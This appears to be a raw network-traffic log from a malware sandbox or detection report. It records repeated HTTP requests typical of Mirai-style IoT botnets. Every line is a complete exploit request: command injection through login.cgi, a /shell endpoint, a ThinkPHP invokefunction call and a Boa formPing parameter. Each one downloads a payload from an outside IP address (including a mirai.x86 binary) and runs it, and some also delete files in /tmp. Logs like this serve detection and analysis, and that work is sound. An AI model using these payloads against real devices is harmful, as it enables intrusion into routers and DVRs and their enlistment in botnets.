Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |